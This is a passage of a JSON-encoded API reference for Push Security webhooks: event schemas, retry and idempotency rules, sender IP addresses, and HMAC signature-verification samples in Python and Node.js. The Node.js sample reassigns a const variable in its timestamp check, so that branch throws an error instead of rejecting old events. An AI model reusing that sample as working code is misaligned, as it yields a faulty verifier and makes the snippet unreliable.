event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"category":{"type":"string","enum":["ENTITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Google Workspace first observed"},"object":{"type":"string","enum":["APP"],"description":"The object that was created, updated or deleted."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App"},"new":{"$ref":"#/components/schemas/AppEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The new state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"DELETE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},"old":{"$ref":"#/components/schemas/AppEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_766"},"schema_767":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"category":{"type":"string","enum":["ENTITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"app.pushsecurity.com first observed"},"object":{"type":"string","enum":["APP_OTHER"],"description":"The object that was created, updated or deleted."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App (Other)"},"new":{"$ref":"#/components/schemas/AppOther","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The new state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"DELETE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},"old":{"$ref":"#/components/schemas/AppOther","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_767"},"schema_768":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"category":{"type":"string","enum":["ENTITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"New browser for user@example.com"},"object":{"type":"string","enum":["BROWSER"],"description":"The object that was created, updated or deleted."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Browser"},"new":{"$ref":"#/components/schemas/BrowserEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The new state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"DELETE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},"old":{"$ref":"#/components/schemas/BrowserEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_768"},"schema_769":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"category":{"type":"string","enum":["ENTITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Browser extension Privacy Badger installed"},"object":{"type":"string","enum":["BROWSER_EXTENSION"],"description":"The object that was created, updated or deleted."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Browser extension"},"new":{"$ref":"#/components/schemas/BrowserExtensionEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The new state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"DELETE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},"old":{"$ref":"#/components/schemas/BrowserExtensionEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_769"},"schema_770":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"category":{"type":"string","enum":["ENTITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"employee@example.com added"},"object":{"type":"string","enum":["EMPLOYEE"],"description":"The object that was created, updated or deleted."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Employee"},"new":{"$ref":"#/components/schemas/EmployeeEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The new state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"DELETE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},"old":{"$ref":"#/components/schemas/EmployeeEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_770"},"schema_771":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"category":{"type":"string","enum":["ENTITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"MFA not registered finding observed for user@example.com on Google Workspace"},"object":{"type":"string","enum":["FINDING"],"description":"The object that was created, updated or deleted."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Finding"},"new":{"$ref":"#/components/schemas/FindingEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The new state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"DELETE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},"old":{"$ref":"#/components/schemas/FindingEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_771"}},"exampleStore":{},"securitySchemeStore":{"X-Signature":{"id":"X-Signature","type":"http","scheme":"bearer","description":"Signature verification"}},"servers":[{"url":"https://api.pushsecurity.com"}]},"options":{"codeSamples":{"languages":[],"skipOptionalParameters":true},"jsonSamplesExpandLevel":5,"onlyRequiredInSamples":true,"sortRequiredPropsFirst":true,"schemasExpansionLevel":"all","layout":"three-panel","hideReplay":true,"hideSidebar":true,"mockServer":{"off":true},"disableRouter":true,"downloadUrls":[{"url":"/help/audience/engineering/_bundle/webhooks-v1.json?download"},{"url":"/help/audience/engineering/_bundle/webhooks-v1.yaml?download"}],"excludeFromSearch":false,"specType":"openapi","markdocOptions":{"tags":{},"nodes":{},"components":{}},"metadata":{"title":"Push Security Webhooks","description":"## Overview\n\nConfigure webhooks for the Push Security platform and receive real-time updates when events occur.\n\nEach webhook event has the following:\n* Versioning\n* Idempotency key\n* Metadata\n* New and old objects to show exactly what has changed\n* A signature for verifying sender authenticity\n\n## Creating webhooks\n\nTo create or manage your webhooks, go to the [Settings](https://console.pushsecurity.com/app/settings/webhooks) page in the Push admin console.\n\n## Acknowledging an event\n\nYour endpoint has 5 seconds to respond with a `200 OK` (or any other 2xx response). Otherwise, retry behavior will be triggered.\n\n## Retry behavior\n\nEach event will be sent a maximum of 4 times at the following time intervals:\n* Immediately\n* After 1 minute\n* After 5 minutes\n* After 15 minutes\n\nIf the event is acknowledged within a 5-second window, no more retries will be attempted.\n\nEach retry of the event will have a newly generated `X-Signature`, but the event `id` will be the same for all retries.\n\n## Handling duplicate events\n\nThe payload body is JSON-encoded and contains an idempotency key named `id`. If you want to ensure that you handle an event exactly once, please store this value and compare it against incoming events. This can be used to discard duplicate events that have been delivered more than once.\n\n## Verifying signatures\n\nEach event has a header `X-Signature` which contains 2 parts:\n* A UNIX timestamp value `t` (in seconds)\n* An HMAC-SHA-256 value `v1` which contains the payload signature to check using your webhook secret obtained at the time you created it\n\nHere is an example of how it is formatted:\n```\nX-Signature: t=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE\n```\n\nTo calculate and verify the signature, perform the following steps:\n1. Parse the `X-Signature` header by splitting it first by `,` and then by `=` to obtain key-value pairs.\n2. Store the `t` (timestamp) and `v1` (signature) values in variables.\n3. Concatenate the value of `t` (as a string) with a `.` and the JSON request body (in its raw format).\n4. Use the HMAC-SHA256 algorithm to compute the hash of the concatenated string.\n5. Compare the computed HMAC with the `v1` value from the header to verify the signature.\n6. Additionally, check the timestamp (`t`) and compare it to the current time. If the difference is bigger than 35 mins (or your preferable threshold) you should discard the event to avoid replay attacks.\n\nExample in Python:\n\n```py\nimport json\nimport hmac\nimport hashlib\nimport time\n\n# Your secret key for the webhook\nSECRET_KEY = b'psws_ad9d0bba8260baf774c3821acaff1b7d'\n\n# Example header and request body (you would normally get these from the incoming HTTP request)\nexample_header = 't=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE'\nexample_request_body = json.dumps({\"key\": \"value\"})\n\n# Step 1: Parse the header\nelements = example_header.split(',')\nparsed_header = {}\nfor element in elements:\n    key, value = element.split('=')\n    parsed_header[key] = value\n\n# Step 2: Store 't' and 'v1' values in variables\nreceived_t = parsed_header.get('t')\nreceived_v1 = parsed_header.get('v1')\n\n# Step 3: Concatenate 't' value with '.' and the JSON request body\npayload = f\"{received_t}.{example_request_body}\"\n\n# Step 4: Compute the HMAC using SHA256\ncomputed_hmac = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest().upper()\n\n# Step 5: Compare the signature\nis_valid = hmac.compare_digest(received_v1, computed_hmac)\n\n# Step 6: Check the timestamp\ncurrent_time = int(time.time())\ntime_difference = current_time - int(received_t)\nif time_difference > 2100:  # 35 minutes\n    is_valid = False\n    message = \"Timestamp is too old.\"\nelse:\n    message = \"Signature verified\" if is_valid else \"Signature mismatch\"\n\nprint(f\"Is the signature valid? {is_valid}. Message: {message}\")\n```\n\nExample in Node.js:\n\n```js\nconst crypto = require('crypto');\n\n// Your secret key for the webhook\nconst SECRET_KEY = 'psws_ad9d0bba8260baf774c3821acaff1b7d';\n\n// Example header and request body (you'd normally get these from the incoming HTTP request)\nconst exampleHeader = 't=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE';\nconst exampleRequestBody = JSON.stringify({ key: 'value' });\n\n// Step 1: Parse the header\nconst elements = exampleHeader.split(',');\nconst parsedHeader = {};\nelements.forEach((element) => {\n  const [key, value] = element.split('=');\n  parsedHeader[key] = value;\n});\n\n// Step 2: Store 't' and 'v1' values in variables\nconst receivedT = parsedHeader['t'];\nconst receivedV1 = parsedHeader['v1'];\n\n// Step 3: Concatenate 't' value with '.' and the JSON request body\nconst payload = `${receivedT}.${exampleRequestBody}`;\n\n// Step 4: Compute the HMAC using SHA256\nconst computedHmac = crypto.createHmac('sha256', SECRET_KEY).update(payload).digest('hex');\n\n// Step 5: Compare the signature\nconst isValid = crypto.timingSafeEqual(Buffer.from(receivedV1, 'hex'), Buffer.from(computedHmac, 'hex'));\n\n// Step 6: Check the timestamp\nconst currentTime = Math.floor(Date.now() / 1000);\nconst timeDifference = currentTime - parseInt(receivedT, 10);\nlet message;\n\nif (timeDifference > 2100) {  // 35 minutes\n  isValid = false;\n  message = 'Timestamp is too old.';\n} else {\n  message = isValid ? 'Signature verified' : 'Signature mismatch';\n}\n\nconsole.log(`Is the signature valid? ${isValid}. Message: ${message}`);\n\n```\n\n## Versioning\n\nThe payload body is JSON-encoded and contains a value named `version`. You're currently working with version 1 of the Push Security webhooks. Should there be any breaking changes in the future, we'll bump up this version number. If you have any webhooks configured, we'll send you notifications over email about the deprecation date for the older version.\n\n## Custom headers\n\nSome SIEMs or other external systems where you may wish to send Push webhook events require a custom HTTP header for authorization. You can configure a custom header for webhooks in the Push admin console.\n\nGo to **Settings** > **Webhooks** and add a new webhook. You will see a dropdown option for **Custom headers**.\n\nThen enter a header key and value. Note that once your header key and value are entered, you will not be able to view them again, as they may contain secrets.\n\n## Filtering events\n\nYou may wish to send only specific types (or categories) of Push webhook events to your receiver. You can configure this when creating a new webhook in the Push admin console.\n\nGo to **Settings** > **Webhooks** and add a new webhook. You will see a dropdown option for **Select events**.\n\nThen you can select the specific events, or categories of events, to enable. If you select a category, any new events that are added to that category later (as part of new features released) will also be sent.\n\n## IP addresses\n\nPush sends webhook events from three static IP addresses:\n\n* 34.241.178.196\n* 54.75.174.254\n* 52.214.240.129\n\nWe recommend that you allowlist these addresses. **Note**: These addresses are within the AWS EC2 public IP range for `eu-west-1` that were used prior to March 2026. Existing customers do not need to update their allowlist unless they wish to narrow it to just these static IP addresses.\n"}},"baseSlug":"/webhooks-v1","routesMapping":{}}